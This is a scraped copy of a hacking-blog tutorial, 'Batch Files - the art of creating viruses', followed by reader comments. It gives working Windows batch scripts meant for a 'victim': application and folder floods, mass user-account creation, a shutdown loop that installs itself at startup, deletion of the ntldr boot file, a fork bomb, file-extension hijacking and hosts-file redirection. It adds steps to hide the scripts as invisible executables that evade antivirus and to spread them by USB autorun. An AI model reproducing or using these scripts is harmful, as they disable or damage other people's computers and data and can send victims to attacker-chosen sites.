Batch Files - The Art of Creating Viruses
-
Upload
uma-shanker -
Category
Documents
-
view
104 -
download
1
description
Transcript of Batch Files - The Art of Creating Viruses
8/8/13 Batch Files - the art of creating viruses| Ethical Hacking Tutorials | How to hack
www.explorehacking.com/2011/01/batch-files-art-of-creating-viruses.html 1/8
Explore Hackingthe dark side of technology // WE REGRET TO INFORM THAT ALL TUTORIAL IMAGES HAVE BEEN ACCIDENTALLY DELETED //
Batch Files - the art of creating virusesPosted by Aneesh M. Makker at 1:23 AM / Categories: malicious, viruses, windows /
I could just you give the codes to paste in notepad and ask you to save files with extension .bat and
your deadly batch viruses would be ready. But instead of that, I have focussed on making the basics of
batch files clear and developing the approach to code your own viruses.
What are Batch Files ?Lets begin with a simple example , Open your command prompt
and change your current directory to 'desktop' by typing 'cd
desktop' without quotes.
Now type these commands one by one
1. md x //makes directory 'x' on desktop
2. cd x // changes current directory to 'x'
3. md y // makes a directory 'y' in directory 'x'
We first make a folder/directory 'x', then enter in folder 'x',then make a folder 'y' in folder 'x' .
Now delete the folder 'x'.
Lets do the same thing in an other way. Copy these three commands in notepad and save file
as anything.bat
Get articles in your inbox
Enter your email address:
Subscribe
Do not forget to click on the link sent in
INBOX to verify subscription
Search any topic
Search
Categories
email fake login page Hacking Website
malicious
phishing proxies Spywares
viruses Website website
vulnerabilitis windows
Translate Page
Select Language
Pow ered by Translate
Connect With us on Facebook
Popular Posts
Metasploit Tutorial - With an
example | Exploiting the
vulnerabilities
Phishing - Creating,uploading and
using fake login pages
Setting Backdoor in Windows |
Command Prompt On Logon
Screen
SQL Injection | Step by Step deface
website
Batch Files - the art of creating
viruses
Send , identify , trace Fake/Spoofed
Email | Email Bombing | Email
home about us privacy policy disclaimer articles write for us
Anonymity email spoofing fake email
hiding IP keyloggers metasploit
RAT trojan
XSS
8/8/13 Batch Files - the art of creating viruses| Ethical Hacking Tutorials | How to hack
www.explorehacking.com/2011/01/batch-files-art-of-creating-viruses.html 2/8
Now just double click on this batch file and the same work would be done , You will get a folder 'x' on
your desktop and folder 'y' in it. This means the three commands executed line by line when we ran the
batch file
So a batch file is simply a text containing series of commands which are executed
automatically line by line when the batch file is run.
What can batch viruses do ?
They can be used to delete the windows files,format data,steal information,irritate victim, consume CPU
resources to affect performance,disable firewalls,open ports,modify or destroy registry and for many
more purposes.
Now lets start with simple codes, Just copy the code to notepad and save it as anything.bat (I
am anything you wish but extension must be bat and save it as 'all files' instead of text files).
Note: Type 'help' in command prompt to know about some basic commands and to know about using
a particular command , type 'command_name /?' without quotes.
1. Application Bomber
@echo off // It instructs to hide the commands when batch files is executed
:x //loop variable
start winword
start mspaint //open paint
start notepad
start write
start cmd //open command prompt
start explorer
start control
start calc // open calculator
goto x // infinite loop
This code when executed will start open different applications like paint,notepad,command prompt
repeatedly, irritating victim and ofcourse affecting performance.
2. Folder flooder
@echo off
:x
md %random% // makes directory/folder.
goto x
Here %random% is a variable that would generate a positive no. randomly. So this code would make
start creating folders whose name can be any random number.
3.User account flooder
@echo off
:x
net user %random% /add //create user account
goto x
This code would start creating windows user accounts whose names could be any random numbers.
3.Shutdown Virus
copy anything.bat “C:\Documents and Settings\Administrator\Start Menu\Programs\Startup”
copy anything.bat “C:\Documents and Settings\All Users\Start Menu\Programs\Startup” //these two
commands will copy the batchfile in start up folders (in XP)
Spamming
Trojan Horse | RAT | Configure and
Use | Tutorial- Part 2
SQL INJECTION | Website Deface |
Using tool | Live Example
Desktop Phishing - Step by step
tutorial
Remote Keylogger - configure and
use
Do Not Copy Articles
8/8/13 Batch Files - the art of creating viruses| Ethical Hacking Tutorials | How to hack
www.explorehacking.com/2011/01/batch-files-art-of-creating-viruses.html 3/8
shutdown -s -t 00 //this will shutdown the computer in 0 seconds
Note : Files in Start up folder gets started automatically when windows starts . You should first two
lines of code in every virus code so that it would copy itself in startup folder. Start up folder path in
Windows 7 is C:\Users\sys\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Everytime the victim would start the computer, the batch file in start up would run and shutdown the
computer immediately. You can remove this virus by booting the computer in Safe Mode and deleting
the batch file from Start Up folder.
4. Deleting boot files
Goto C drive in Win XP , Tools->Folder Option->View
Now Uncheck the option 'Hide operating system files' and check option 'Show hidden files and folders'.
Click apply
Now you can see the operating system files. There is a one file 'ntldr' which is boot loader used to boot
the windows.
Lets make a batch file to
delete this file from victim's computer and the windows will not start then.
attrib -S -R -H C:\ntldr // -S,-R,-H to clear system fi le attribute, read only attribute , hidden fi le attribute respectively
del ntldr //delete ntldr fi le
After running this batch file , system will not reboot and a normal victim would definitely install the
windows again.
5. Fork Bomb
%0|%0 //Its percentage zero pipe percentage zero
This code creates a large number of processes very quickly in order to saturate the process table of
windows. It will just hang the windows .
8/8/13 Batch Files - the art of creating viruses| Ethical Hacking Tutorials | How to hack
www.explorehacking.com/2011/01/batch-files-art-of-creating-viruses.html 4/8
6. Extension Changer
@echo off
assoc .txt=anything // this command associates extension .txt with filetype anything.
assoc .exe=anything
assoc .jpeg=anything
assoc .png=anything
assoc .mpeg=anything
Every extension is associated with a filetype like extension ‘exe’ is is associated with filetype ‘exefile’.
To see them, just enter command ‘assoc’ in command prompt.
Above code changes the association of some extensions to filetype ‘anything’ (means u can write
anything) which obviously doesn’t exist. So all exe (paint,games,command prompt and many
more),jpeg,png,mpeg files wudn’t open properly.
7. DNS Poisoning
There is a file called ‘hosts’ located at c:\windows\system32\drivers\etc. We can place a website and
an IP in front of it. By doing this, we want our web browser to take us to host located at that IP when
that website name would be entered. I mean request to resolve IP of website is not sent to Domain
Name Server(DNS) if the name of website in hosts file.
@echo off
echo xxx.xxx.xxx.xxx www.anything.com > C:\windows\system32\drivers\etc\hosts //this command
prints or add xxx.xxx.xxx.xxx. www.anything.com in hosts file.
Replace xxx.xxx.xxx.xxx and www.anything.com with IP address and website of your choice. You can
take/redirect victim to any host located at specific IP when he wud try to log on to specific website or u
can simply block any website by entering its name and any invalid IP address.
Viruses we just coded
8/8/13 Batch Files - the art of creating viruses| Ethical Hacking Tutorials | How to hack
www.explorehacking.com/2011/01/batch-files-art-of-creating-viruses.html 5/8
Note : Most of the batch viruses are simply undetectable by any anitiviruses
Tip : Coding good viruses just depends on the DOS commands you know and logic you use.
Limitations of Batch Viruses -:
1.Victim can easily read the commands by opening batch file in notepad.
2.The command prompt screen pops up,it alerts the victim and he can stop it.
To overcome these limitations,we need to convert these batch files into executable files that is exe
files.
Download this Batch To Exe coverter from here.
After running converter , open the batch file virus , Save as exe file , set visibility mode 'Invisible
application' , than just click on compile button.
You can use other options as per your requirement.
Spreading batch viruses through pen drive -:
Step 1.
Open notepad and write
[autorun]
open=anything.bat
Icon=anything.ico
Save file as ‘autorun.inf’
Step 2. Put this ‘autorun.inf’ and your actual batch virus ‘anything.bat’ in pendrive .
8/8/13 Batch Files - the art of creating viruses| Ethical Hacking Tutorials | How to hack
www.explorehacking.com/2011/01/batch-files-art-of-creating-viruses.html 6/8
20 comments: Post a Comment
Jesse Posted at: January 13, 2011 at 1:46 PM
Divyam Makker Posted at: February 8, 2011 at 11:30 AM
Aneesh M. Makker Posted at: February 8, 2011 at 8:32 PM
bongs Posted at: February 22, 2011 at 3:40 AM
Aneesh M. Makker Posted at: February 22, 2011 at 4:10 AM
deathprogrammmer Posted at: March 6, 2011 at 7:26 PM
Anonymous Posted at: March 24, 2011 at 9:33 PM
When the victim would plug in pen drive,the autorun.inf will launch anything.bat and commands in batch
file virus would execute.
haha I remember doing the NTLDR removal trick on a buddy of mine like 3 years ago, he was like."umm,
dude... my computer wont boot up. What do I do?" I replied with, "You get a really big elephant and get it
to step on your computer." :P
I've Got Another Nice idea to make these batch files undetectable...
Google "batch file to exe converter" it converts your batch file to .exe software and no anti-virus detects it
as virus !! \m/
;Divyam
I have provided the same thing in article. I think you dint read the full article. :)
im having a problem changing the directory to destop...if i open the command prompt and type "cd
desktop" it says the system cannot find the path specified
In windows XP you are by defalut at one directory above desktop, but not in windows 7. So give full path
cd C:\users\account_name\desktop
EXCELLENT compilation!!
DNS poisoning is not working ..After creating .bat files when i run them they did not run and the others
which run gives the problem that the application has failed to initialize properly(0x0000142).click ok to
terminate..
plzz sir help wat is the problem????
8/8/13 Batch Files - the art of creating viruses| Ethical Hacking Tutorials | How to hack
www.explorehacking.com/2011/01/batch-files-art-of-creating-viruses.html 7/8
Anonymous Posted at: June 8, 2011 at 12:07 AM
Anonymous Posted at: July 2, 2011 at 8:55 AM
Anonymous Posted at: July 6, 2011 at 5:52 AM
Anonymous Posted at: January 19, 2012 at 11:39 AM
Anonymous Posted at: February 3, 2012 at 3:33 PM
Anonymous Posted at: February 28, 2012 at 9:16 AM
Anonymous Posted at: March 8, 2012 at 7:41 AM
Anonymous Posted at: July 31, 2012 at 11:51 AM
Lokesh Daiya Posted at: October 12, 2012 at 12:56 AM
I had deleted ntldr. what to do now to get it back an run my pc? I don't want to format it. Plz help me
Plz help
If u delete ur ntldr. then first copy this file from any other winows system. Then keep this in usb. In ur
system boot any ( I prefer ubuntu) linux live cd.Dont install that. Just boot from live cd. When u see ubuntu
desktop . U can find ur partitions of windows theire. then find ur coorect folder in c drive. paste ntdlr and
reboot sysyem. Remove linux cd. You can see ur old windows.
autorun is not working plz help..
nyc
Very nice website, keep up with the good work man
It will be very nice if you wrote a topic about the way antiviruses works, you know signatures and that kind
of stuff, and if you know some ways to trick them
spreading of virus is not working ????????
Autorun is not working!!!
hello...i lkove this website helped me alot with everything...when i write in notepad lets say start(wich open
cmd)and i save it as all filles with the extension .batch...and i want to open the file it says that i must
choose a program from a list.can you please help me?i would appreciate it alot
copy anything.bat “C:\Documents and Settings\Administrator\Start Menu\Programs\Startup”
copy anything.bat “C:\Documents and Settings\All Users\Start Menu\Programs\Startup”
both command not working neither in bat file nor cmd
and also i try for windows 7 using
copy anything.bat %userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
8/8/13 Batch Files - the art of creating viruses| Ethical Hacking Tutorials | How to hack
www.explorehacking.com/2011/01/batch-files-art-of-creating-viruses.html 8/8
Anonymous Posted at: October 14, 2012 at 9:32 AM
anugrah balakrishnan Posted at: January 2, 2013 at 2:53 AM
Anonymous Posted at: January 2, 2013 at 7:17 PM
Anonymous Posted at: January 4, 2013 at 11:32 AM
Post a Comment
Previous- NextHome-Subscribe to: Post Comments (Atom)
it gives htat command has syntax error
but cant success
Nice compilation of codes ^̂
can you tell me how to eat up our hard drives memory space??:)
Hello, I wrote and ran the Extension Changer virus (double clicked by mistake) and as you can assume,
all me files were screwed. I managed to boot up in safe mode and change everything except for the
executables. I did that by typing assoc in safe modes cmd and then I found all of the file extensions
affected and wrote down the correct ones. Then I changed them with the following: assoc
.filetype=.file_extension. This worked for everything except my executables. Please help me, and sorry for
writing so much. I just want to be sure that I gave enough info.
Ok So If I am putting the file in a pen drive do i have to convert it and save it as an .exe file?
Enter your comment...
Comment as: Google Account
Publish Preview
Copyright 2010. Explore Hacking all rights reserved.